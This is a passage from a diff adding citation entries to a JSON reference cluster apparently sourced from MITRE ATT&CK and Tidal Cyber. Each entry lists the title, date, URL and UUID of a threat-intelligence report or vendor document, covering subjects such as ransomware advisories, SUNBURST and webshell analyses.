"title": "SSL Checker" + }, + "related": [], + "uuid": "a8dc493f-2021-48fa-8f28-afd13756b789", + "value": "SSLShopper Lookup" + }, + { + "description": "Ubuntu. (n.d.). SSSD. Retrieved September 23, 2021.", + "meta": { + "date_accessed": "2021-09-23T00:00:00Z", + "refs": [ + "https://ubuntu.com/server/docs/service-sssd" + ], + "source": "MITRE", + "title": "SSSD" + }, + "related": [], + "uuid": "f2ed1c28-8cde-4279-a04c-217a4dc68121", + "value": "Ubuntu SSSD Docs" + }, + { + "description": "Vachon, F., Faou, M. (2017, July 20). Stantinko: A massive adware campaign operating covertly since 2012. Retrieved November 16, 2017.", + "meta": { + "date_accessed": "2017-11-16T00:00:00Z", + "date_published": "2017-07-20T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/" + ], + "source": "MITRE", + "title": "Stantinko: A massive adware campaign operating covertly since 2012" + }, + "related": [], + "uuid": "d81e0274-76f4-43ce-b829-69f761e280dc", + "value": "Stantinko Botnet" + }, + { + "description": "Amazon. (n.d.). Start Building on AWS Today. Retrieved October 13, 2021.", + "meta": { + "date_accessed": "2021-10-13T00:00:00Z", + "refs": [ + "https://aws.amazon.com" + ], + "source": "MITRE", + "title": "Start Building on AWS Today" + }, + "related": [], + "uuid": "b7d41cde-18c8-4e15-a0ac-ca0afc127e33", + "value": "Amazon AWS" + }, + { + "description": "Apple. (2016, September 13). Startup Items. Retrieved July 11, 2017.", + "meta": { + "date_accessed": "2017-07-11T00:00:00Z", + "date_published": "2016-09-13T00:00:00Z", + "refs": [ + "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html" + ], + "source": "MITRE", + "title": "Startup Items" + }, + "related": [], + "uuid": "e36dd211-22e4-4b23-befb-fbfe1a84b866", + "value": "Startup Items" + }, + { + "description": "Microsoft. (n.d.). Start your PC in safe mode in Windows 10. Retrieved June 23, 2021.", + "meta": { + "date_accessed": "2021-06-23T00:00:00Z", + "refs": [ + "https://support.microsoft.com/en-us/windows/start-your-pc-in-safe-mode-in-windows-10-92c27cff-db89-8644-1ce4-b3e5e56fe234" + ], + "source": "MITRE", + "title": "Start your PC in safe mode in Windows 10" + }, + "related": [], + "uuid": "fdddb25b-22ba-4433-b25f-bad340ffc849", + "value": "Microsoft Safe Mode" + }, + { + "description": "Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022.", + "meta": { + "date_accessed": "2022-07-08T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/apt41-us-state-governments" + ], + "source": "MITRE", + "title": "State Governments" + }, + "related": [], + "uuid": "e54415fe-40c2-55ff-9e75-881bc8a912b8", + "value": "Mandiant APT41" + }, + { + "description": "Desimone, J. (2018, April 18). Status Update. Retrieved July 3, 2018.", + "meta": { + "date_accessed": "2018-07-03T00:00:00Z", + "date_published": "2018-04-18T00:00:00Z", + "refs": [ + "https://twitter.com/dez_/status/986614411711442944" + ], + "source": "MITRE", + "title": "Status Update" + }, + "related": [], + "uuid": "9cee0681-3ad2-4b1d-8eeb-5160134f3069", + "value": "Twitter SquiblyTwo Detection APR 2018" + }, + { + "description": "Pena, E., Erikson, C. (2019, October 10). Staying Hidden on the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.", + "meta": { + "date_accessed": "2021-11-29T00:00:00Z", + "date_published": "2019-10-10T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode" + ], + "source": "MITRE", + "title": "Staying Hidden on the Endpoint: Evading Detection with Shellcode" + }, + "related": [], + "uuid": "5d43542f-aad5-4ac5-b5b6-1a2b03222fc8", + "value": "Mandiant Endpoint Evading 2019" + }, + { + "description": "Dr. Nestori Syynimaa. (2022, February 15). Stealing and faking Azure AD device identities. Retrieved February 21, 2023.", + "meta": { + "date_accessed": "2023-02-21T00:00:00Z", + "date_published": "2022-02-15T00:00:00Z", + "refs": [ + "https://aadinternals.com/post/deviceidentity/" + ], + "source": "MITRE", + "title": "Stealing and faking Azure AD device identities" + }, + "related": [], + "uuid": "b5ef16c4-1db0-51e9-93ab-54a8e480debc", + "value": "AADInternals Azure AD Device Identities" + }, + { + "description": "Syynimaa, N. (2022, February 15). Stealing and faking Azure AD device identities. Retrieved August 3, 2022.", + "meta": { + "date_accessed": "2022-08-03T00:00:00Z", + "date_published": "2022-02-15T00:00:00Z", + "refs": [ + "https://o365blog.com/post/deviceidentity/" + ], + "source": "MITRE", + "title": "Stealing and faking Azure AD device identities" + }, + "related": [], + "uuid": "ec94c043-92ef-4691-b21a-7ea68f39e338", + "value": "O365 Blog Azure AD Device IDs" + }, + { + "description": "Fuller, R. (2013, September 11). Stealing passwords every time they change. Retrieved November 21, 2017.", + "meta": { + "date_accessed": "2017-11-21T00:00:00Z", + "date_published": "2013-09-11T00:00:00Z", + "refs": [ + "http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html" + ], + "source": "MITRE", + "title": "Stealing passwords every time they change" + }, + "related": [], + "uuid": "78ed9074-a46c-4ce6-ab7d-a587bd585dc5", + "value": "Carnal Ownage Password Filters Sept 2013" + }, + { + "description": "Clayton, M.. (2012, September 14). Stealing US business secrets: Experts ID two huge cyber 'gangs' in China. Retrieved February 15, 2018.", + "meta": { + "date_accessed": "2018-02-15T00:00:00Z", + "date_published": "2012-09-14T00:00:00Z", + "refs": [ + "https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China" + ], + "source": "MITRE", + "title": "Stealing US business secrets: Experts ID two huge cyber 'gangs' in China" + }, + "related": [], + "uuid": "6b79006d-f6de-489c-82fa-8c3c28d652ef", + "value": "CSM Elderwood Sept 2012" + }, + { + "description": "Maldonado, D., McGuffin, T. (2016, August 6). Sticky Keys to the Kingdom. Retrieved July 5, 2017.", + "meta": { + "date_accessed": "2017-07-05T00:00:00Z", + "date_published": "2016-08-06T00:00:00Z", + "refs": [ + "https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom" + ], + "source": "MITRE", + "title": "Sticky Keys to the Kingdom" + }, + "related": [], + "uuid": "f903146d-b63d-4771-8d53-28ef137c9349", + "value": "DEFCON2016 Sticky Keys" + }, + { + "description": "The DFIR Report. (2023, April 4). Stolen Images Campaign Ends in Conti Ransomware. Retrieved June 23, 2023.", + "meta": { + "date_accessed": "2023-06-23T00:00:00Z", + "date_published": "2023-04-04T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/" + ], + "source": "Tidal Cyber", + "title": "Stolen Images Campaign Ends in Conti Ransomware" + }, + "related": [], + "uuid": "4a89916f-3919-41fd-bf93-27f25a2363f5", + "value": "The DFIR Report Stolen Images Conti" + }, + { + "description": "ASERT team. (2018, December 5). STOLEN PENCIL Campaign Targets Academia. Retrieved February 5, 2019.", + "meta": { + "date_accessed": "2019-02-05T00:00:00Z", + "date_published": "2018-12-05T00:00:00Z", + "refs": [ + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/" + ], + "source": "MITRE", + "title": "STOLEN PENCIL Campaign Targets Academia" + }, + "related": [], + "uuid": "6d3b31da-a784-4da0-91dd-b72c04fd520a", + "value": "Netscout Stolen Pencil Dec 2018" + }, + { + "description": "Cole, R., Moore, A., Stark, G., Stancill, B. (2020, February 5). STOMP 2 DIS: Brilliance in the (Visual) Basics. Retrieved September 17, 2020.", + "meta": { + "date_accessed": "2020-09-17T00:00:00Z", + "date_published": "2020-02-05T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html" + ], + "source": "MITRE", + "title": "STOMP 2 DIS: Brilliance in the (Visual) Basics" + }, + "related": [], + "uuid": "bd034cc8-29e2-4d58-a72a-161b831191b7", + "value": "FireEye VBA stomp Feb 2020" + }, + { + "description": "Amazon Web Services. (n.d.). Stopping CloudTrail from Sending Events to CloudWatch Logs. Retrieved October 16, 2020.", + "meta": { + "date_accessed": "2020-10-16T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.html" + ], + "source": "MITRE", + "title": "Stopping CloudTrail from Sending Events to CloudWatch Logs" + }, + "related": [], + "uuid": "affb4d4f-5c96-4c27-b702-b8ad9bc8e1b3", + "value": "Stopping CloudTrail from Sending Events to CloudWatch Logs" + }, + { + "description": "Roccia, T. (2017, January 19). Stopping Malware With a Fake Virtual Machine. Retrieved April 17, 2019.", + "meta": { + "date_accessed": "2019-04-17T00:00:00Z", + "date_published": "2017-01-19T00:00:00Z", + "refs": [ + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/" + ], + "source": "MITRE", + "title": "Stopping Malware With a Fake Virtual Machine" + }, + "related": [], + "uuid": "a541a027-733c-438f-a723-6f7e8e6f354c", + "value": "McAfee Virtual Jan 2017" + }, + { + "description": "Check Point Research. (2021, January 4). Stopping Serial Killer: Catching the Next Strike. Retrieved September 7, 2021.", + "meta": { + "date_accessed": "2021-09-07T00:00:00Z", + "date_published": "2021-01-04T00:00:00Z", + "refs": [ + "https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/" + ], + "source": "MITRE", + "title": "Stopping Serial Killer: Catching the Next Strike" + }, + "related": [], + "uuid": "a988084f-1a58-4e5b-a616-ed31d311cccf", + "value": "Checkpoint Dridex Jan 2021" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2023, December 19). #StopRansomware: ALPHV Blackcat. Retrieved December 19, 2023.", + "meta": { + "date_accessed": "2023-12-19T00:00:00Z", + "date_published": "2023-12-19T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-353a" + ], + "source": "Tidal Cyber", + "title": "#StopRansomware: ALPHV Blackcat" + }, + "related": [], + "uuid": "d28d64cf-b5db-4438-8c5c-907ce5f55f69", + "value": "U.S. CISA ALPHV Blackcat December 2023" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2023, October 11). #StopRansomware: AvosLocker Ransomware (Update). Retrieved October 20, 2023.", + "meta": { + "date_accessed": "2023-10-20T00:00:00Z", + "date_published": "2023-10-11T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-284a" + ], + "source": "Tidal Cyber", + "title": "#StopRansomware: AvosLocker Ransomware (Update)" + }, + "related": [], + "uuid": "d419a317-6599-4fc5-91d1-a4c2bc83bf6a", + "value": "U.S. CISA AvosLocker October 11 2023" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2023, May 16). #StopRansomware: BianLian Ransomware Group. Retrieved May 18, 2023.", + "meta": { + "date_accessed": "2023-05-18T00:00:00Z", + "date_published": "2023-05-16T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a" + ], + "source": "Tidal Cyber", + "title": "#StopRansomware: BianLian Ransomware Group" + }, + "related": [], + "uuid": "aa52e826-f292-41f6-985d-0282230c8948", + "value": "U.S. CISA BianLian Ransomware May 2023" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2023, June 7). #StopRansomware: CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability. Retrieved July 27, 2023.", + "meta": { + "date_accessed": "2023-07-27T00:00:00Z", + "date_published": "2023-06-07T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-158a" + ], + "source": "Tidal Cyber", + "title": "#StopRansomware: CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability" + }, + "related": [], + "uuid": "07e48ca8-b965-4234-b04a-dfad45d58b22", + "value": "U.S. CISA CL0P CVE-2023-34362 Exploitation" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2022, October 26). #StopRansomware: Daixin Team. Retrieved May 19, 2023.", + "meta": { + "date_accessed": "2023-05-19T00:00:00Z", + "date_published": "2022-10-26T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-294a" + ], + "source": "Tidal Cyber", + "title": "#StopRansomware: Daixin Team" + }, + "related": [], + "uuid": "cbf5ecfb-de79-41cc-8250-01790ff6e89b", + "value": "U.S. CISA Daixin Team October 2022" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2023, March 16). #StopRansomware: LockBit 3.0. Retrieved May 19, 2023.", + "meta": { + "date_accessed": "2023-05-19T00:00:00Z", + "date_published": "2023-03-16T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a" + ], + "source": "Tidal Cyber", + "title": "#StopRansomware: LockBit 3.0" + }, + "related": [], + "uuid": "06de9247-ce40-4709-a17a-a65b8853758b", + "value": "U.S. CISA LockBit 3.0 March 2023" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2023, November 21). #StopRansomware: LockBit 3.0 Ransomware Affiliates Exploit CVE 2023-4966 Citrix Bleed Vulnerability. Retrieved November 30, 2023.", + "meta": { + "date_accessed": "2023-11-30T00:00:00Z", + "date_published": "2023-11-21T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a" + ], + "source": "Tidal Cyber", + "title": "#StopRansomware: LockBit 3.0 Ransomware Affiliates Exploit CVE 2023-4966 Citrix Bleed Vulnerability" + }, + "related": [], + "uuid": "21f56e0c-9605-4fbb-9cb1-f868ba6eb053", + "value": "U.S. CISA LockBit Citrix Bleed November 21 2023" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2022, August 11). #StopRansomware: MedusaLocker. Retrieved August 4, 2023.", + "meta": { + "date_accessed": "2023-08-04T00:00:00Z", + "date_published": "2022-08-11T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-181a" + ], + "source": "Tidal Cyber", + "title": "#StopRansomware: MedusaLocker" + }, + "related": [], + "uuid": "48b34fb3-c346-4165-a4c6-caeaa9b02dba", + "value": "U.S. CISA MedusaLocker August 11 2022" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2023, December 18). #StopRansomware: Play Ransomware. Retrieved December 18, 2023.", + "meta": { + "date_accessed": "2023-12-18T00:00:00Z", + "date_published": "2023-12-18T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-352a" + ], + "source": "Tidal Cyber", + "title": "#StopRansomware: Play Ransomware" + }, + "related": [], + "uuid": "ad96148c-8230-4923-86fd-4b1da211db1a", + "value": "U.S. CISA Play Ransomware December 2023" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2023, November 15). #StopRansomware: Rhysida Ransomware. Retrieved November 16, 2023.", + "meta": { + "date_accessed": "2023-11-16T00:00:00Z", + "date_published": "2023-11-15T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-319a" + ], + "source": "Tidal Cyber", + "title": "#StopRansomware: Rhysida Ransomware" + }, + "related": [], + "uuid": "6d902955-d9a9-4ec1-8dd4-264f7594605e", + "value": "U.S. CISA Rhysida Ransomware November 15 2023" + }, + { + "description": "CISA. (2023, March 2). #StopRansomware: Royal Ransomware. Retrieved March 31, 2023.", + "meta": { + "date_accessed": "2023-03-31T00:00:00Z", + "date_published": "2023-03-02T00:00:00Z", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a" + ], + "source": "MITRE", + "title": "#StopRansomware: Royal Ransomware" + }, + "related": [], + "uuid": "81baa61e-13c3-51e0-bf22-08383dbfb2a1", + "value": "CISA Royal AA23-061A March 2023" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2022, September 8). #StopRansomware: Vice Society. Retrieved May 19, 2023.", + "meta": { + "date_accessed": "2023-05-19T00:00:00Z", + "date_published": "2022-09-08T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-249a-0" + ], + "source": "Tidal Cyber", + "title": "#StopRansomware: Vice Society" + }, + "related": [], + "uuid": "0a754513-5f20-44a0-8cea-c5d9519106c8", + "value": "U.S. CISA Vice Society September 2022" + }, + { + "description": "LOLBAS. (2021, October 21). Stordiag.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-10-21T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Stordiag/" + ], + "source": "Tidal Cyber", + "title": "Stordiag.exe" + }, + "related": [], + "uuid": "5e52a211-7ef6-42bd-93a1-5902f5e1c2ea", + "value": "Stordiag.exe - LOLBAS Project" + }, + { + "description": "netbiosX. (2017, April 19). Stored Credentials. Retrieved April 6, 2018.", + "meta": { + "date_accessed": "2018-04-06T00:00:00Z", + "date_published": "2017-04-19T00:00:00Z", + "refs": [ + "https://pentestlab.blog/2017/04/19/stored-credentials/" + ], + "source": "MITRE", + "title": "Stored Credentials" + }, + "related": [], + "uuid": "5be9afb8-749e-45a2-8e86-b5e6dc167b41", + "value": "Pentestlab Stored Credentials" + }, + { + "description": "Microsoft. (2021, October 28). Store passwords using reversible encryption. Retrieved January 3, 2022.", + "meta": { + "date_accessed": "2022-01-03T00:00:00Z", + "date_published": "2021-10-28T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption" + ], + "source": "MITRE", + "title": "Store passwords using reversible encryption" + }, + "related": [], + "uuid": "d3b9df24-b776-4658-9bb4-f43a2fe0094c", + "value": "store_pwd_rev_enc" + }, + { + "description": "IBM Support. (2017, April 26). Storwize USB Initialization Tool may contain malicious code. Retrieved May 28, 2019.", + "meta": { + "date_accessed": "2019-05-28T00:00:00Z", + "date_published": "2017-04-26T00:00:00Z", + "refs": [ + "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146&myns=s028&mynp=OCSTHGUJ&mynp=OCSTLM5A&mynp=OCSTLM6B&mynp=OCHW206&mync=E&cm_sp=s028-_-OCSTHGUJ-OCSTLM5A-OCSTLM6B-OCHW206-_-E" + ], + "source": "MITRE", + "title": "Storwize USB Initialization Tool may contain malicious code" + }, + "related": [], + "uuid": "321cf27a-327d-4824-84d0-56634d3b86f5", + "value": "IBM Storwize" + }, + { + "description": "Han, Karsten. (2019, June 4). Strange Bits: Sodinokibi Spam, CinaRAT, and Fake G DATA. Retrieved August 4, 2020.", + "meta": { + "date_accessed": "2020-08-04T00:00:00Z", + "date_published": "2019-06-04T00:00:00Z", + "refs": [ + "https://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data" + ], + "source": "MITRE", + "title": "Strange Bits: Sodinokibi Spam, CinaRAT, and Fake G DATA" + }, + "related": [], + "uuid": "03b1ef5a-aa63-453a-affc-aa0caf174ce4", + "value": "G Data Sodinokibi June 2019" + }, + { + "description": "Cowan, C. (2017, March 23). Strengthening the Microsoft Edge Sandbox. Retrieved March 12, 2018.", + "meta": { + "date_accessed": "2018-03-12T00:00:00Z", + "date_published": "2017-03-23T00:00:00Z", + "refs": [ + "https://blogs.windows.com/msedgedev/2017/03/23/strengthening-microsoft-edge-sandbox/" + ], + "source": "MITRE", + "title": "Strengthening the Microsoft Edge Sandbox" + }, + "related": [], + "uuid": "d7097b1e-507b-4626-9cef-39367c09f722", + "value": "Windows Blogs Microsoft Edge Sandbox" + }, + { + "description": "Symantec Security Response. (2016, August 7). Strider: Cyberespionage group turns eye of Sauron on targets. Retrieved August 17, 2016.", + "meta": { + "date_accessed": "2016-08-17T00:00:00Z", + "date_published": "2016-08-07T00:00:00Z", + "refs": [ + "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets" + ], + "source": "MITRE, Tidal Cyber", + "title": "Strider: Cyberespionage group turns eye of Sauron on targets" + }, + "related": [], + "uuid": "664eac41-257f-4d4d-aba5-5d2e8e2117a7", + "value": "Symantec Strider Blog" + }, + { + "description": "Cybereason Nocturnus. (2022, February 1). StrifeWater RAT: Iranian APT Moses Staff Adds New Trojan to Ransomware Operations. Retrieved August 15, 2022.", + "meta": { + "date_accessed": "2022-08-15T00:00:00Z", + "date_published": "2022-02-01T00:00:00Z", + "refs": [ + "https://www.cybereason.com/blog/research/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations" + ], + "source": "MITRE", + "title": "StrifeWater RAT: Iranian APT Moses Staff Adds New Trojan to Ransomware Operations" + }, + "related": [], + "uuid": "30c911b2-9a5e-4510-a78c-c65e84398c7e", + "value": "Cybereason StrifeWater Feb 2022" + }, + { + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.", + "meta": { + "date_accessed": "2020-07-20T00:00:00Z", + "date_published": "2020-06-30T00:00:00Z", + "refs": [ + "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf" + ], + "source": "MITRE", + "title": "StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure" + }, + "related": [], + "uuid": "7d2e20f2-20ba-4d51-9495-034c07be41a8", + "value": "Bitdefender StrongPity June 2020" + }, + { + "description": "Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.", + "meta": { + "date_accessed": "2020-09-11T00:00:00Z", + "date_published": "2020-09-10T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/" + ], + "source": "MITRE", + "title": "STRONTIUM: Detecting new patterns in credential harvesting" + }, + "related": [], + "uuid": "0a65008c-acdd-40fa-af1a-3d9941af8eac", + "value": "Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020" + }, + { + "description": "Matrosov, A., Rodionov, E., Harley, D., Malcho, J.. (n.d.). Stuxnet Under the Microscope. Retrieved December 7, 2020.", + "meta": { + "date_accessed": "2020-12-07T00:00:00Z", + "refs": [ + "https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf" + ], + "source": "MITRE", + "title": "Stuxnet Under the Microscope" + }, + "related": [], + "uuid": "4ec039a9-f843-42de-96ed-185c4e8c2d9f", + "value": "ESET Stuxnet Under the Microscope" + }, + { + "description": "Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET Profilers. Retrieved June 24, 2020.", + "meta": { + "date_accessed": "2020-06-24T00:00:00Z", + "date_published": "2017-05-18T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html" + ], + "source": "MITRE", + "title": "Subvert CLR Process Listing With .NET Profilers" + }, + "related": [], + "uuid": "6ef42019-5393-423e-811d-29b728c877e1", + "value": "subTee .NET Profilers May 2017" + }, + { + "description": "Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018.", + "meta": { + "date_accessed": "2018-01-31T00:00:00Z", + "date_published": "2017-09-01T00:00:00Z", + "refs": [ + "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf" + ], + "source": "MITRE", + "title": "Subverting Trust in Windows" + }, + "related": [], + "uuid": "0b6e7651-0e17-4101-ab2b-22cb09fe1691", + "value": "SpectorOps Subverting Trust Sept 2017" + }, + { + "description": "DiMaggio, J. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016.", + "meta": { + "date_accessed": "2016-08-03T00:00:00Z", + "date_published": "2016-03-15T00:00:00Z", + "refs": [ + "http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates" + ], + "source": "MITRE, Tidal Cyber", + "title": "Suckfly: Revealing the secret life of your code signing certificates" + }, + "related": [], + "uuid": "8711c175-e405-4cb0-8c86-8aaa471e5573", + "value": "Symantec Suckfly March 2016" + }, + { + "description": "Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018.", + "meta": { + "date_accessed": "2018-03-19T00:00:00Z", + "date_published": "2018-01-01T00:00:00Z", + "refs": [ + "https://www.sudo.ws/" + ], + "source": "MITRE", + "title": "Sudo Man Page" + }, + "related": [], + "uuid": "659d4302-d4cf-41af-8007-aa1da0208aa0", + "value": "sudo man page 2018" + }, + { + "description": "Stephen Eckels, Jay Smith, William Ballenthin. (2020, December 24). SUNBURST Additional Technical Details. Retrieved January 6, 2021.", + "meta": { + "date_accessed": "2021-01-06T00:00:00Z", + "date_published": "2020-12-24T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/12/sunburst-additional-technical-details.html" + ], + "source": "MITRE", + "title": "SUNBURST Additional Technical Details" + }, + "related": [], + "uuid": "c5d94f7f-f796-4872-9a19-f030c825588e", + "value": "FireEye SUNBURST Additional Details Dec 2020" + }, + { + "description": "Check Point Research. (2020, December 22). SUNBURST, TEARDROP and the NetSec New Normal. Retrieved January 6, 2021.", + "meta": { + "date_accessed": "2021-01-06T00:00:00Z", + "date_published": "2020-12-22T00:00:00Z", + "refs": [ + "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/" + ], + "source": "MITRE", + "title": "SUNBURST, TEARDROP and the NetSec New Normal" + }, + "related": [], + "uuid": "a6b75979-af51-42ed-9bb9-01d5fb9ceac9", + "value": "Check Point Sunburst Teardrop December 2020" + }, + { + "description": "Check Point Research. (2020, December 22). SUNBURST, TEARDROP and the NetSec New Normal. Retrieved January 6, 2021.", + "meta": { + "date_accessed": "2021-01-06T00:00:00Z", + "date_published": "2020-12-22T00:00:00Z", + "refs": [ + "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/" + ], + "source": "MITRE", + "title": "SUNBURST, TEARDROP and the NetSec New Normal" + }, + "related": [], + "uuid": "4e3d9201-83d4-5375-b3b7-e00dfb16342d", + "value": "CheckPoint Sunburst & Teardrop December 2020" + }, + { + "description": "CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021.", + "meta": { + "date_accessed": "2021-01-11T00:00:00Z", + "date_published": "2021-01-11T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/" + ], + "source": "MITRE", + "title": "SUNSPOT: An Implant in the Build Process" + }, + "related": [], + "uuid": "3a7b71cf-961a-4f63-84a8-31b43b18fb95", + "value": "CrowdStrike SUNSPOT Implant January 2021" + }, + { + "description": "Onuma. (2015, February 24). Superfish: Adware Preinstalled on Lenovo Laptops. Retrieved February 20, 2017.", + "meta": { + "date_accessed": "2017-02-20T00:00:00Z", + "date_published": "2015-02-24T00:00:00Z", + "refs": [ + "https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/" + ], + "source": "MITRE", + "title": "Superfish: Adware Preinstalled on Lenovo Laptops" + }, + "related": [], + "uuid": "3d554c05-992c-41f3-99f4-6b0baac56b3a", + "value": "Kaspersky Superfish" + }, + { + "description": "Tennis, M. (2020, December 17). SUPERNOVA: A Novel .NET Webshell. Retrieved February 22, 2021.", + "meta": { + "date_accessed": "2021-02-22T00:00:00Z", + "date_published": "2020-12-17T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/solarstorm-supernova/" + ], + "source": "MITRE", + "title": "SUPERNOVA: A Novel .NET Webshell" + }, + "related": [], + "uuid": "e884d0b5-f2a2-47cb-bb77-3acdac6b1790", + "value": "Unit42 SUPERNOVA Dec 2020" + }, + { + "description": "Riley, W. (2020, December 1). SUPERNOVA SolarWinds .NET Webshell Analysis. Retrieved February 18, 2021.", + "meta": { + "date_accessed": "2021-02-18T00:00:00Z", + "date_published": "2020-12-01T00:00:00Z", + "refs": [ + "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/" + ], + "source": "MITRE", + "title": "SUPERNOVA SolarWinds .NET Webshell Analysis" + }, + "related": [], + "uuid": "78fee365-ab2b-4823-8358-46c362be1ac0", + "value": "Guidepoint SUPERNOVA Dec 2020" + }, + { + "description": "0x00pico. (2017, September 25). Super-Stealthy Droppers. Retrieved October 4, 2021.", + "meta": { + "date_accessed": "2021-10-04T00:00:00Z", + "date_published": "2017-09-25T00:00:00Z", + "refs": [ + "https://0x00sec.org/t/super-stealthy-droppers/3715" + ], + "source": "MITRE", + "title": "Super-Stealthy Droppers" + }, + "related": [], + "uuid": "7569e79b-5a80-4f42-b467-8548cc9fc319", + "value": "00sec Droppers" + }, + { + "description": "FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to SunshopFireEye. Retrieved March 6, 2017.", + "meta": { + "date_accessed": "2017-03-06T00:00:00Z", + "date_published": "2014-01-01T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop" + ], + "source": "MITRE", + "title": "SUPPLY CHAIN ANALYSIS: From Quartermaster to SunshopFireEye" + }, + "related": [], + "uuid": "0647b285-963b-4427-bc96-a17b5f8839a9", + "value": "FireEyeSupplyChain" + }, + { + "description": 